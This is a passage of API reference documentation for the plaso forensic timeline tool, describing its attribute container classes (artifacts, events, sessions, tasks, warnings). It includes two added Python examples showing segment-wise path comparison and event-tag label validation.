        Writes the table to the output writer.
        Parameters: output_writer (OutputWriter) – output writer.

class plaso.cli.views.ViewsFactory
    Bases: object

    Views factory.

    FORMAT_TYPE_CLI = 'cli'
    FORMAT_TYPE_MARKDOWN = 'markdown'

    classmethod GetTableView(format_type, column_names=None, title=None, title_level=3)
        Retrieves a table view.
        Parameters:
            • format_type (str) – table view format type.
            • column_names (Optional[list[str]]) – column names.
            • title (Optional[str]) – title.
            • title_level (Optional[int]) – title heading level.
        Returns: table view.
        Return type: BaseTableView
        Raises: ValueError – if the format type is not supported.

Module contents

5.1.4 plaso.containers package

Submodules

plaso.containers.analyzer_result module

Analyzer result attribute container.

class plaso.containers.analyzer_result.AnalyzerResult
    Bases: plaso.containers.interface.AttributeContainer

    Attribute container to store results of analyzers.

    Analyzers can produce results with different attribute names. For example, the ‘hashing’ analyzer could produce an attribute ‘md5_hash’, with a value of ‘d41d8cd98f00b204e9800998ecf8427e’.

    analyzer_name
        name of the analyzer that produced the result.
        Type: str

    attribute_name
        name of the attribute produced.
        Type: str

    attribute_value
        value of the attribute produced.
        Type: str

    CONTAINER_TYPE = 'analyzer_result'

plaso.containers.artifacts module

Artifact attribute containers.

class plaso.containers.artifacts.ArtifactAttributeContainer
    Bases: plaso.containers.interface.AttributeContainer

    Base class to represent an artifact attribute container.

class plaso.containers.artifacts.EnvironmentVariableArtifact(case_sensitive=True, name=None, value=None)
    Bases: plaso.containers.artifacts.ArtifactAttributeContainer

    Environment variable artifact attribute container.

    Also see: https://en.wikipedia.org/wiki/Environment_variable

    case_sensitive
        True if environment variable name is case sensitive.
        Type: bool

    name
        environment variable name such as “SystemRoot” as in “%SystemRoot%” or “HOME” as in “$HOME”.
        Type: str

    value
        environment variable value such as “C:\Windows” or “/home/user”.
        Type: str

    CONTAINER_TYPE = 'environment_variable'

class plaso.containers.artifacts.HostnameArtifact(name=None, schema='DNS')
    Bases: plaso.containers.artifacts.ArtifactAttributeContainer

    Hostname artifact attribute container.

    Also see: https://en.wikipedia.org/wiki/Hostname and the Cybox / Stix Hostname Object.

    name
        name of the host according to the naming schema.
        Type: str

    schema
        naming schema such as “DNS”, “NIS”, “SMB/NetBIOS”.
        Type: str

    CONTAINER_TYPE = 'hostname'

class plaso.containers.artifacts.OperatingSystemArtifact(family=None, product=None, version=None)
    Bases: plaso.containers.artifacts.ArtifactAttributeContainer

    Operating system artifact attribute container.

    family
        operating system family name, such as “Linux”, “MacOS” or “Windows”, defined in definitions.OPERATING_SYSTEM_FAMILIES. This value is used to programmatically link a parser preset to an operating system and therefore must be one of the predefined values.
        Type: str

    name
        operating system name, such as “macOS Mojave” or “Windows XP”. This value is used to programmatically link a parser preset to an operating system and therefore must be one of the predefined values.
        Type: str

    product
        product information, such as “macOS Mojave” or “Windows Professional XP”. This value is typically obtained from the source data.
        Type: str

    version
        version, such as “10.14.1” or “5.1”. This value is typically obtained from the source data.
        Type: str

    CONTAINER_TYPE = 'operating_system'

    IsEquivalent(other)
        Determines if 2 operating system artifacts are equivalent.

        This function compares the operating systems in order of:
            • name derived from product
            • family and version
            • family

        Parameters: other (OperatingSystemArtifact) – operating system artifact attribute container to compare with.
        Returns: True if the operating systems are considered equivalent, False if the most specific criteria do not match, or no criteria are available.
        Return type: bool

    property version_tuple
        version tuple or None if version is not set or invalid.
        Type: tuple[int]

class plaso.containers.artifacts.PathArtifact(data_stream=None, path=None, path_segment_separator='/')
    Bases: plaso.containers.artifacts.ArtifactAttributeContainer

    Path artifact attribute container.

    data_stream
        name of a data stream.
        Type: str

    path_segment_separator
        path segment separator.
        Type: str

    path_segments
        path segments.
        Type: list[str]

    CONTAINER_TYPE = 'path'

    ContainedIn(other)
        Determines if the path is contained in other.

        Parameters: other (str) – path to compare against.
        Returns: True if the path is contained in other.
        Return type: bool

    __eq__(other)
        Determines if the path is equal to other.
        Parameters: other (str) – path to compare against.
        Returns: True if the path is equal to other.
        Return type: bool

    __ge__(other)
        Determines if the path is greater than or equal to other.
        Parameters: other (str) – path to compare against.
        Returns: True if the path is greater than or equal to other.
        Return type: bool
        Raises: ValueError – if other is not an instance of string.

    __gt__(other)
        Determines if the path is greater than other.
        Parameters: other (str) – path to compare against.
        Returns: True if the path is greater than other.
        Return type: bool
        Raises: ValueError – if other is not an instance of string.

    __le__(other)
        Determines if the path is less than or equal to other.
        Parameters: other (str) – path to compare against.
        Returns: True if the path is less than or equal to other.
        Return type: bool
        Raises: ValueError – if other is not an instance of string.

    __lt__(other)
        Determines if the path is less than other.
        Parameters: other (str) – path to compare against.
        Returns: True if the path is less than other.
        Return type: bool
        Raises: ValueError – if other is not an instance of string.

    __ne__(other)
        Determines if the path is not equal to other.
        Parameters: other (str) – path to compare against.
        Returns: True if the path is not equal to other.
        Return type: bool
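Every comparison method above takes a path string and compares it against the container's path_segments rather than against the raw string. That is the property that makes a path container safe for containment checks: a plain string-prefix test reports /home/user2/.ssh/id_rsa as lying inside /home/user, a segment-wise test does not. The block below is an added example, not plaso's code. The ContainedIn() semantics it implements (this path is other or lies below it, with empty segments from repeated or trailing separators ignored) are an assumption made for the example, as is the NaivePrefixCheck() helper shown for contrast.

```python
"""Added example, not plaso's own code: a PathArtifact that compares paths
segment by segment, beside the string-prefix check it replaces. The
ContainedIn() semantics and the splitting rules are this example's choices."""
import functools


def NaivePrefixCheck(path, directory):
  """The string-prefix test to avoid: '/home/user2/...' starts with
  '/home/user', so a collection filter built on it over-collects."""
  return path.startswith(directory)


@functools.total_ordering
class PathArtifact(object):
  """Path artifact attribute container (illustrative re-implementation)."""

  def __init__(self, data_stream=None, path=None, path_segment_separator='/'):
    self.data_stream = data_stream
    self.path_segment_separator = path_segment_separator
    self.path_segments = self._SplitPath(path or '', path_segment_separator)

  @staticmethod
  def _SplitPath(path, separator):
    """Splits a path into segments.

    Empty segments after the first are dropped so '/a//b/' equals '/a/b';
    the leading empty segment of an absolute path is kept so '/a' and 'a'
    stay distinct.
    """
    split_path = path.split(separator)
    segments = [split_path[0]]
    segments.extend(segment for segment in split_path[1:] if segment)
    return segments

  def _OtherSegments(self, other):
    """Splits the path string other; raises ValueError if it is not a str."""
    if not isinstance(other, str):
      raise ValueError('other must be a path string')
    return self._SplitPath(other, self.path_segment_separator)

  def ContainedIn(self, other):
    """Returns True if this path is other or lies below it, segment-wise."""
    other_segments = self._OtherSegments(other)
    return self.path_segments[:len(other_segments)] == other_segments

  def __eq__(self, other):
    if not isinstance(other, str):
      return NotImplemented  # So 'artifact == 5' is False, not an error.
    return self.path_segments == self._OtherSegments(other)

  def __lt__(self, other):
    # total_ordering derives __le__, __gt__ and __ge__ from this and __eq__;
    # all of them raise ValueError for a non-string other via _OtherSegments.
    return self.path_segments < self._OtherSegments(other)


if __name__ == '__main__':
  print(NaivePrefixCheck('/home/user2/.ssh/id_rsa', '/home/user'))  # True
  print(PathArtifact(path='/home/user2/.ssh/id_rsa').ContainedIn('/home/user'))  # False
```

The same segment-wise rule works unchanged for Windows paths once the separator is set to a backslash, which is why the container carries path_segment_separator alongside the segments.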


class plaso.containers.artifacts.SourceConfigurationArtifact(path_spec=None)
Bases: plaso.containers.artifacts.ArtifactAttributeContainer
Source configuration artifact attribute container.
The source configuration contains the configuration data of a source that is (or is going to be) processed, such as a volume in a storage media image or a mounted directory.
mount_path: path of a “mounted” directory input source. Type str
path_spec: path specification of the source that is processed. Type dfvfs.PathSpec
system_configuration: system configuration of a specific system installation, such as Windows or Linux, detected by the preprocessing on the source. Type SystemConfigurationArtifact
CONTAINER_TYPE = 'source_configuration'

class plaso.containers.artifacts.SystemConfigurationArtifact(code_page=None, time_zone=None)
Bases: plaso.containers.artifacts.ArtifactAttributeContainer
System configuration artifact attribute container.
The system configuration contains the configuration data of a specific system installation, such as Windows or Linux.
available_time_zones: available time zones. Type list[TimeZone]
code_page: system code page. Type str
hostname: hostname. Type HostnameArtifact
keyboard_layout: keyboard layout. Type str
operating_system: operating system, for example “MacOS” or “Windows”. Type str
operating_system_product: operating system product, for example “Windows XP”. Type str
operating_system_version: operating system version, for example “10.9.2” or “8.1”.


  Type str
time_zone: system time zone. Type str
user_accounts: user accounts. Type list[UserAccountArtifact]
windows_eventlog_providers: Windows Event Log providers. Type list[WindowsEventLogProviderArtifact]
CONTAINER_TYPE = 'system_configuration'

class plaso.containers.artifacts.TimeZoneArtifact(localized_name=None, mui_form=None, name=None, offset=None)
Bases: plaso.containers.artifacts.ArtifactAttributeContainer
Time zone artifact attribute container.
localized_name: name describing the time zone in the localized language, for example “Greenwich (standaardtijd)”. Type str
mui_form: MUI form of the name describing the time zone, for example “@tzres.dll,-112”. Type str
name: name describing the time zone, for example “Greenwich Standard Time”. Type str
offset: time zone offset in number of minutes from UTC. Type int
CONTAINER_TYPE = 'time_zone'

class plaso.containers.artifacts.UserAccountArtifact(full_name=None, group_identifier=None, identifier=None, path_separator='/', user_directory=None, username=None)
Bases: plaso.containers.artifacts.ArtifactAttributeContainer
User account artifact attribute container.
Also see: Cybox / Stix User Account Object
full_name: name describing the user. Type str
group_identifier: identifier of the primary group the user is part of. Type str


identifier: user identifier. Type str
user_directory: path of the user (or home or profile) directory. Type str
username: name uniquely identifying the user. Type str
CONTAINER_TYPE = 'user_account'
GetUserDirectoryPathSegments()
  Retrieves the path segments of the user directory.
  Returns: path segments of the user directory or an empty list if no user directory is set.
  Return type: list[str]

class plaso.containers.artifacts.WindowsEventLogProviderArtifact(category_message_files=None, event_message_files=None, log_source=None, log_type=None, parameter_message_files=None)
Bases: plaso.containers.artifacts.ArtifactAttributeContainer
Windows Event Log provider artifact attribute container.
category_message_files: filenames of the category message files. Type list[str]
event_message_files: filenames of the event message files. Type list[str]
log_source: Windows Event Log source. Type str
log_type: Windows Event Log type. Type str
parameter_message_files: filenames of the parameter message files. Type list[str]
CONTAINER_TYPE = 'windows_eventlog_provider'


plaso.containers.event_sources module

Event source attribute containers.

class plaso.containers.event_sources.EventSource(path_spec=None)
Bases: plaso.containers.interface.AttributeContainer
Event source attribute container.
The event source object contains information about where a specific event originates, e.g. a file, the $STANDARD_INFORMATION MFT attribute, or the Application Compatibility cache.
data_type: attribute container type indicator. Type str
file_entry_type: dfVFS file entry type. Type str
path_spec: path specification. Type dfvfs.PathSpec
CONTAINER_TYPE = 'event_source'
DATA_TYPE = None
__lt__(other)
  Compares if the event source attribute container is less than the other.
  Parameters: other (EventSource) – event source attribute container to compare to.
  Returns: True if the event source attribute container is less than the other.
  Return type: bool

class plaso.containers.event_sources.FileEntryEventSource(path_spec=None)
Bases: plaso.containers.event_sources.EventSource
File entry event source.
The file entry event source is an event source that represents a file within a file system.
DATA_TYPE = 'file_entry'

plaso.containers.events module

Event attribute containers.

class plaso.containers.events.EventData(data_type=None)
Bases: plaso.containers.interface.AttributeContainer
Event data attribute container.
The event data attribute container represents the attributes of an entity, such as a database record or log line.
data_type: event data type indicator. Type str


parser: string identifying the parser that produced the event data. Type str
CONTAINER_TYPE = 'event_data'
GetAttributeValuesString()
  Retrieves a comparable string of the attribute values.
  Returns: comparable string of the attribute values.
  Return type: str
  Raises: TypeError – if the attribute value type is not supported.
GetEventDataStreamIdentifier()
  Retrieves the identifier of the associated event data stream. The event data stream identifier is a storage specific value that requires special handling during serialization.
  Returns: event data stream identifier or None when not set.
  Return type: AttributeContainerIdentifier
SetEventDataStreamIdentifier(event_data_stream_identifier)
  Sets the identifier of the associated event data stream. The event data stream identifier is a storage specific value that requires special handling during serialization.
  Parameters: event_data_stream_identifier (AttributeContainerIdentifier) – event data stream identifier.

class plaso.containers.events.EventDataStream
Bases: plaso.containers.interface.AttributeContainer
Event data stream attribute container.
The event data stream attribute container represents the attributes of a data stream, such as the content of a file or extended attribute.
file_entropy: byte entropy value of the data stream. Type str
md5_hash: MD5 digest hash of the data stream. Type str
path_spec: path specification of the data stream. Type dfvfs.PathSpec
sha1_hash: SHA-1 digest hash of the data stream. Type str
sha256_hash: SHA-256 digest hash of the data stream. Type str


yara_match: names of the Yara rules that matched the data stream. Type list[str]
CONTAINER_TYPE = 'event_data_stream'

class plaso.containers.events.EventObject
Bases: plaso.containers.interface.AttributeContainer
Event attribute container.
The framework is designed to parse files and create events from individual records, log lines or keys extracted from files. The event object provides an extensible data store for event attributes.
date_time: date and time values. Type dfdatetime.DateTimeValues
timestamp: timestamp, which contains the number of microseconds since January 1, 1970, 00:00:00 UTC. Type int
timestamp_desc: description of the meaning of the timestamp. Type str
CONTAINER_TYPE = 'event'
GetEventDataIdentifier()
  Retrieves the identifier of the associated event data. The event data identifier is a storage specific value that requires special handling during serialization.
  Returns: event data identifier or None when not set.
  Return type: AttributeContainerIdentifier
SetEventDataIdentifier(event_data_identifier)
  Sets the identifier of the associated event data. The event data identifier is a storage specific value that requires special handling during serialization.
  Parameters: event_data_identifier (AttributeContainerIdentifier) – event data identifier.
__lt__(other)
  Compares if the event attribute container is less than the other. Events are compared by timestamp.
  Parameters: other (EventObject) – event attribute container to compare to.
  Returns: True if the event attribute container is less than the other.
  Return type: bool

class plaso.containers.events.EventTag
Bases: plaso.containers.interface.AttributeContainer
Event tag attribute container.
labels: labels, such as “malware”, “application_execution”.


  Type list[str]
AddLabel(label)
  Adds a label to the event tag.
  Parameters: label (str) – label.
  Raises:
  • TypeError – if the label provided is not a string.
  • ValueError – if a label is malformed.
AddLabels(labels)
  Adds labels to the event tag.
  Parameters: labels (list[str]) – labels.
  Raises: ValueError – if a label is malformed.
CONTAINER_TYPE = 'event_tag'
classmethod CopyTextToLabel(text, prefix='')
  Copies a string to a label. A label only supports a limited set of characters, therefore unsupported characters are replaced with an underscore.
  Parameters:
  • text (str) – label text.
  • prefix (Optional[str]) – label prefix.
  Returns: label.
  Return type: str
CopyToDict()
  Copies the event tag to a dictionary.
  Returns: event tag attributes.
  Return type: dict[str, object]
GetEventIdentifier()
  Retrieves the identifier of the associated event. The event identifier is a storage specific value that requires special handling during serialization.
  Returns: event identifier or None when not set.
  Return type: AttributeContainerIdentifier
SetEventIdentifier(event_identifier)
  Sets the identifier of the associated event. The event identifier is a storage specific value that requires special handling during serialization.
  Parameters: event_identifier (AttributeContainerIdentifier) – event identifier.
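The EventTag contract above (labels restricted to a limited character set, malformed labels rejected with ValueError, non-string labels with TypeError, and the storage specific event identifier kept out of the serialized dictionary) is illustrated by this added, self-contained model. It is not plaso's own code; the label alphabet (letters, digits and underscore) and the hypothetical analysis strings are assumptions, and the base class is a minimal stand-in for plaso.containers.interface.AttributeContainer.

```python
import re

# Assumed label alphabet; the documentation only states that a label supports a
# "limited set of characters" and that unsupported ones become underscores.
_VALID_LABEL = re.compile(r'^[A-Za-z0-9_]+$')
_INVALID_LABEL_CHARS = re.compile(r'[^A-Za-z0-9_]')


class AttributeContainer(object):
  """Minimal stand-in for the attribute container interface (not plaso's code).

  Public members are serializable attributes; members starting with an
  underscore (such as storage identifiers) are never serialized.
  """

  CONTAINER_TYPE = None

  def GetAttributes(self):
    """Yields (name, value) pairs for public attributes that are not None."""
    for name, value in sorted(self.__dict__.items()):
      if name.startswith('_') or value is None:
        continue
      yield name, value

  def CopyToDict(self):
    """Copies the serializable attributes to a dictionary."""
    return dict(self.GetAttributes())


class EventTag(AttributeContainer):
  """Event tag attribute container modelled on the documented behaviour."""

  CONTAINER_TYPE = 'event_tag'

  def __init__(self):
    super(EventTag, self).__init__()
    self.labels = []
    # Storage specific value: handled specially, not part of CopyToDict().
    self._event_identifier = None

  @classmethod
  def CopyTextToLabel(cls, text, prefix=''):
    """Copies a string to a label, replacing unsupported characters with '_'."""
    return _INVALID_LABEL_CHARS.sub('_', '{0:s}{1:s}'.format(prefix, text))

  def AddLabel(self, label):
    """Adds a label; raises TypeError or ValueError on a bad label."""
    if not isinstance(label, str):
      raise TypeError('label is not a string type.')
    if not _VALID_LABEL.match(label):
      raise ValueError('unsupported label: "{0:s}"'.format(label))
    if label not in self.labels:
      self.labels.append(label)

  def AddLabels(self, labels):
    """Adds labels; rejects the whole list if any label is malformed."""
    for label in labels:
      if not _VALID_LABEL.match(label):
        raise ValueError('unsupported label: "{0:s}"'.format(label))
    for label in labels:
      if label not in self.labels:
        self.labels.append(label)

  def GetEventIdentifier(self):
    return self._event_identifier

  def SetEventIdentifier(self, event_identifier):
    self._event_identifier = event_identifier


def BuildTagFromAnalysisText(event_identifier, texts, prefix=''):
  """Turns free-form analysis strings into a tag for one event.

  Example of how an analysis plugin would label an event: raw detection names
  (constructed sample values) are normalised with CopyTextToLabel first, so
  AddLabels never sees a malformed label.
  """
  event_tag = EventTag()
  event_tag.SetEventIdentifier(event_identifier)
  event_tag.AddLabels([EventTag.CopyTextToLabel(text, prefix=prefix)
                       for text in texts])
  return event_tag


def LabelIsValid(label):
  """Returns True if AddLabel would accept the label, False otherwise."""
  try:
    EventTag().AddLabel(label)
  except (TypeError, ValueError):
    return False
  return True


if __name__ == '__main__':
  # Constructed sample detection names, as an analysis plugin might produce.
  tag = BuildTagFromAnalysisText(
      'event:0001', ['Win32/Foo.A', 'Win32/Foo.A', 'PUA: Bar Tool'],
      prefix='malware_')
  print(tag.labels)         # ['malware_Win32_Foo_A', 'malware_PUA__Bar_Tool']
  print(tag.CopyToDict())   # the event identifier is not serialized
```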

plaso.containers.interface module

The attribute container interface.

class plaso.containers.interface.AttributeContainer
Bases: object
The attribute container interface.
This is the base class for those objects that exist primarily as a container of attributes with basic accessors and mutators.
The CONTAINER_TYPE class attribute contains a string that identifies the container type, for example the container type “event” identifies an event object.
Attributes are public class members of a serializable type. Protected and private class members are not to be serialized, with the exception of those defined in _SERIALIZABLE_PROTECTED_ATTRIBUTES.
CONTAINER_TYPE = None
CopyFromDict(attributes)
  Copies the attribute container from a dictionary.
  Parameters: attributes (dict[str, object]) – attribute values per name.
CopyToDict()
  Copies the attribute container to a dictionary.
  Returns: attribute values per name.
  Return type: dict[str, object]
GetAttributeNames()
  Retrieves the names of all attributes.
  Returns: attribute names.
  Return type: list[str]
GetAttributeValuesHash()
  Retrieves a hash of the comparable string of the attribute values.
  Returns: hash of the comparable string of the attribute values.
  Return type: int
GetAttributeValuesString()
  Retrieves a comparable string of the attribute values.
  Returns: comparable string of the attribute values.
  Return type: str
GetAttributes()
  Retrieves the attribute names and values. Attributes that are set to None are ignored.
  Yields: tuple[str, object] – attribute name and value.
GetIdentifier()
  Retrieves the identifier. The identifier is a storage specific value that should not be serialized.
  Returns: a unique identifier for the container.


  Return type: AttributeContainerIdentifier
GetSessionIdentifier()
  Retrieves the session identifier. The session identifier is a storage specific value that should not be serialized.
  Returns: session identifier.
  Return type: str
SetIdentifier(identifier)
  Sets the identifier. The identifier is a storage specific value that should not be serialized.
  Parameters: identifier (AttributeContainerIdentifier) – identifier.
SetSessionIdentifier(session_identifier)
  Sets the session identifier. The session identifier is a storage specific value that should not be serialized.
  Parameters: session_identifier (str) – session identifier.

class plaso.containers.interface.AttributeContainerIdentifier
Bases: object
The attribute container identifier.
The identifier is used to uniquely identify attribute containers. The value should be unique at runtime and in storage.
CopyToString()
  Copies the identifier to a string representation.
  Returns: unique identifier or None.
  Return type: str

plaso.containers.manager module

This file contains the attribute container manager class.

class plaso.containers.manager.AttributeContainersManager
Bases: object
Class that implements the attribute container manager.
classmethod CreateAttributeContainer(container_type)
  Creates an instance of a specific attribute container type.
  Parameters: container_type (str) – container type.
  Returns: an instance of attribute container.
  Return type: AttributeContainer
  Raises: ValueError – if the container type is not supported.
classmethod DeregisterAttributeContainer(attribute_container_class)
  Deregisters an attribute container class. The attribute container classes are identified based on their lower case container type.
  Parameters: attribute_container_class (type) – attribute container class.


  Raises: KeyError – if the attribute container class is not set for the corresponding container type.
classmethod RegisterAttributeContainer(attribute_container_class)
  Registers an attribute container class. The attribute container classes are identified based on their lower case container type.
  Parameters: attribute_container_class (type) – attribute container class.
  Raises: KeyError – if the attribute container class is already set for the corresponding container type.
classmethod RegisterAttributeContainers(attribute_container_classes)
  Registers attribute container classes. The attribute container classes are identified based on their lower case container type.
  Parameters: attribute_container_classes (list[type]) – attribute container classes.
  Raises: KeyError – if an attribute container class is already set for the corresponding container type.

plaso.containers.plist_event module

Plist event attribute containers.

class plaso.containers.plist_event.PlistTimeEventData
Bases: plaso.containers.events.EventData
Plist event data attribute container.
desc: description. Type str
hostname: hostname. Type str
key: name of the plist key. Type str
root: path from the root to this plist key. Type str
username: unique username. Type str
DATA_TYPE = 'plist:key'


plaso.containers.reports module

Report related attribute container definitions.

class plaso.containers.reports.AnalysisReport(plugin_name=None, text=None)
Bases: plaso.containers.interface.AttributeContainer
Analysis report attribute container.
analysis_counter: counter of analysis results, for example the number of events analyzed and tagged. Type collections.Counter
event_filter: event filter expression that was used when the analysis plugin was run. Type str
filter_string: deprecated variant of event_filter. Type str
plugin_name: name of the analysis plugin that generated the report. Type str
report_dict: ??? Type dict[str]
text: report text. Type str
time_compiled: timestamp of the date and time the report was compiled. Type int
CONTAINER_TYPE = 'analysis_report'
CopyToDict()
  Copies the attribute container to a dictionary.
  Returns: attribute values per name.
  Return type: dict[str, object]

plaso.containers.sessions module

Session related attribute container definitions.

class plaso.containers.sessions.Session
Bases: plaso.containers.interface.AttributeContainer
Session attribute container.
aborted: True if the session was aborted.


  Type bool
analysis_reports_counter: number of analysis reports per analysis plugin. Type collections.Counter
artifact_filters: names of artifact definitions that are used for filtering file system and Windows Registry key paths. Type list[str]
command_line_arguments: command line arguments. Type str
completion_time: time that the session was completed. Contains the number of microseconds since January 1, 1970, 00:00:00 UTC. Type int
debug_mode: True if debug mode was enabled. Type bool
enabled_parser_names: parser and parser plugin names that were enabled. Type list[str]
event_labels_counter: number of event tags per label. Type collections.Counter
filter_file: path to a file with find specifications. Type str
identifier: unique identifier of the session. Type str
parser_filter_expression: parser filter expression. Type str
parsers_counter: number of events per parser or parser plugin. Type collections.Counter
preferred_encoding: preferred encoding. Type str
preferred_time_zone: preferred time zone. Type str


preferred_year: preferred year. Type int
product_name: name of the product that created the session, for example “log2timeline”. Type str
product_version: version of the product that created the session. Type str
source_configurations: configuration of sources that are (or are going to be) processed. Type list[SourceConfiguration]
start_time: time that the session was started. Contains the number of microseconds since January 1, 1970, 00:00:00 UTC. Type int
text_prepend: text to prepend to every display name. Type str
CONTAINER_TYPE = 'session'
CopyAttributesFromSessionCompletion(session_completion)
  Copies attributes from a session completion.
  Parameters: session_completion (SessionCompletion) – session completion attribute container.
  Raises: ValueError – if the identifier of the session completion does not match that of the session.
CopyAttributesFromSessionConfiguration(session_configuration)
  Copies attributes from a session configuration.
  Parameters: session_configuration (SessionConfiguration) – session configuration attribute container.
  Raises: ValueError – if the identifier of the session configuration does not match that of the session.
CopyAttributesFromSessionStart(session_start)
  Copies attributes from a session start.
  Parameters: session_start (SessionStart) – session start attribute container.
CreateSessionCompletion()
  Creates a session completion.
  Returns: session completion attribute container.
  Return type: SessionCompletion
CreateSessionConfiguration()
  Creates a session configuration.


  Returns: session configuration attribute container.
  Return type: SessionConfiguration
CreateSessionStart()
  Creates a session start.
  Returns: session start attribute container.
  Return type: SessionStart
UpdateAnalysisReportSessionCounter(analysis_report)
  Updates the analysis report session counter.
  Parameters: analysis_report (AnalysisReport) – a report.
UpdateEventLabelsSessionCounter(event_tag)
  Updates the event labels session counter.
  Parameters: event_tag (EventTag) – an event tag.

class plaso.containers.sessions.SessionCompletion(identifier=None)
Bases: plaso.containers.interface.AttributeContainer
Session completion attribute container.
aborted: True if the session was aborted. Type bool
analysis_reports_counter: number of analysis reports per analysis plugin. Type collections.Counter
event_labels_counter: number of event tags per label. Type collections.Counter
identifier: unique identifier of the session. Type str
parsers_counter: number of events per parser or parser plugin. Type collections.Counter
timestamp: time that the session was completed. Contains the number of microseconds since January 1, 1970, 00:00:00 UTC. Type int
CONTAINER_TYPE = 'session_completion'

class plaso.containers.sessions.SessionConfiguration(identifier=None)
Bases: plaso.containers.interface.AttributeContainer
Session configuration attribute container.
The session configuration contains various settings used within a session, such as the parser and collection filters that are used, and information about the source being processed, such as the system configuration determined by pre-processing.


artifact_filters: names of artifact definitions that are used for filtering file system and Windows Registry key paths. Type list[str]
command_line_arguments: command line arguments. Type str
debug_mode: True if debug mode was enabled. Type bool
enabled_parser_names: parser and parser plugin names that were enabled. Type list[str]
filter_file: path to a file with find specifications. Type str
identifier: unique identifier of the session. Type str
parser_filter_expression: parser filter expression. Type str
preferred_encoding: preferred encoding. Type str
preferred_time_zone: preferred time zone. Type str
preferred_year: preferred year. Type int
source_configurations: configuration of sources that are (or are going to be) processed. Type list[SourceConfiguration]
text_prepend: text to prepend to every display name. Type str
CONTAINER_TYPE = 'session_configuration'

class plaso.containers.sessions.SessionStart(identifier=None)
Bases: plaso.containers.interface.AttributeContainer
Session start attribute container.


identifier: unique identifier of the session. Type str
product_name: name of the product that created the session, for example “log2timeline”. Type str
product_version: version of the product that created the session. Type str
timestamp: time that the session was started. Contains the number of microseconds since January 1, 1970, 00:00:00 UTC. Type int
CONTAINER_TYPE = 'session_start'

plaso.containers.shell_item_events module

Shell item event attribute container.

class plaso.containers.shell_item_events.ShellItemFileEntryEventData
Bases: plaso.containers.events.EventData
Shell item file entry event data attribute container.
name: name of the file entry shell item. Type str
long_name: long name of the file entry shell item. Type str
localized_name: localized name of the file entry shell item. Type str
file_reference: NTFS file reference, in the format: “MFT entry - sequence number”. Type str
shell_item_path: shell item path. Type str
origin: origin of the event. Type str
DATA_TYPE = 'windows:shell_item:file_entry'


plaso.containers.storage_media module

Storage media related attribute container definitions.

class plaso.containers.storage_media.MountPoint(mount_path=None, path_specification=None)
Bases: plaso.containers.interface.AttributeContainer
Mount point attribute container.
mount_path: path where the path specification is mounted, such as “/mnt/image” or “C:”. Type str
path_spec: path specification. Type dfvfs.PathSpec
CONTAINER_TYPE = 'mount_point'

plaso.containers.tasks module

Task related attribute container definitions.

class plaso.containers.tasks.Task(session_identifier=None)
Bases: plaso.containers.interface.AttributeContainer
Task attribute container.
A task describes a piece of work for a multi-processing worker process, for example a task to process a path specification or to analyze an event.
aborted: True if the session was aborted. Type bool
completion_time: time that the task was completed. Contains the number of microseconds since January 1, 1970, 00:00:00 UTC. Type int
file_entry_type: dfVFS type of the file entry the path specification is referencing. Type str
has_retry: True if the task was previously abandoned and a retry task was created, False otherwise. Type bool
identifier: unique identifier of the task. Type str
last_processing_time: the last time the task was marked as being processed, as the number of milliseconds since January 1, 1970, 00:00:00 UTC. Type int


merge_priority: priority used for the task storage file merge, where a lower value indicates a higher priority to merge. Type int
path_spec: path specification. Type dfvfs.PathSpec
session_identifier: the identifier of the session the task is part of. Type str
start_time: time that the task was started. Contains the number of microseconds since January 1, 1970, 00:00:00 UTC. Type int
storage_file_size: size of the storage file in bytes. Type int
storage_format: the format the task results are to be stored in. Type str
CONTAINER_TYPE = 'task'
CreateRetryTask()
  Creates a new task to retry a previously abandoned task. The retry task will have a new identifier but most of the attributes will be a copy of the previously abandoned task.
  Returns: a task to retry a previously abandoned task.
  Return type: Task
CreateTaskCompletion()
  Creates a task completion.
  Returns: task completion attribute container.
  Return type: TaskCompletion
CreateTaskStart()
  Creates a task start.
  Returns: task start attribute container.
  Return type: TaskStart
UpdateProcessingTime()
  Updates the processing time to now.
__lt__(other)
  Compares if the task attribute container is less than the other.
  Parameters: other (Task) – task attribute container to compare to.
  Returns: True if the task attribute container is less than the other.
  Return type: bool


class plaso.containers.tasks.TaskCompletion(identifier=None, session_identifier=None)
Bases: plaso.containers.interface.AttributeContainer
Task completion attribute container.
aborted: True if the session was aborted. Type bool
identifier: unique identifier of the task. Type str
session_identifier: the identifier of the session the task is part of. Type str
timestamp: time that the task was completed. Contains the number of microseconds since January 1, 1970, 00:00:00 UTC. Type int
CONTAINER_TYPE = 'task_completion'

class plaso.containers.tasks.TaskStart(identifier=None, session_identifier=None)
Bases: plaso.containers.interface.AttributeContainer
Task start attribute container.
identifier: unique identifier of the task. Type str
session_identifier: the identifier of the session the task is part of. Type str
timestamp: time that the task was started. Contains the number of microseconds since January 1, 1970, 00:00:00 UTC. Type int
CONTAINER_TYPE = 'task_start'

plaso.containers.time_events module

Time-based event attribute containers.

class plaso.containers.time_events.DateTimeValuesEvent(date_time, date_time_description, time_zone=None)
Bases: plaso.containers.events.EventObject
dfDateTime date time values-based event attribute container.
date_time: date and time values. Type dfdatetime.DateTimeValues


timestamp: timestamp, which contains the number of microseconds since January 1, 1970, 00:00:00 UTC. Type int
timestamp_desc: description of the meaning of the timestamp. Type str

plaso.containers.warnings module

Warning attribute containers.

class plaso.containers.warnings.AnalysisWarning(message=None, plugin_name=None)
Bases: plaso.containers.interface.AttributeContainer
Analysis warning attribute container.
Analysis warnings are produced by analysis plugins when they encounter situations that should be brought to the users’ attention but are not analysis results.
message: warning message. Type str
plugin_name: name of the analysis plugin to which the warning applies. Type str
CONTAINER_TYPE = 'analysis_warning'

class plaso.containers.warnings.ExtractionWarning(message=None, parser_chain=None, path_spec=None)
Bases: plaso.containers.interface.AttributeContainer
Extraction warning attribute container.
Extraction warnings are produced by parsers/plugins when they encounter situations that should be brought to the users’ attention but are not events derived from the data being processed.
message: warning message. Type str
parser_chain: parser chain to which the warning applies. Type str
path_spec: path specification of the file entry to which the warning applies. Type dfvfs.PathSpec
CONTAINER_TYPE = 'extraction_warning'

class plaso.containers.warnings.PreprocessingWarning(message=None, path_spec=None, plugin_name=None)
Bases: plaso.containers.interface.AttributeContainer
Preprocessing warning attribute container.


Preprocessing warnings are produced by preprocessing plugins when they encounter situations that should be brought to the users’ attention but are not preprocessing results.
message: warning message. Type str
path_spec: path specification of the file entry to which the warning applies. Type dfvfs.PathSpec
plugin_name: name of the preprocessing plugin to which the warning applies. Type str
CONTAINER_TYPE = 'preprocessing_warning'

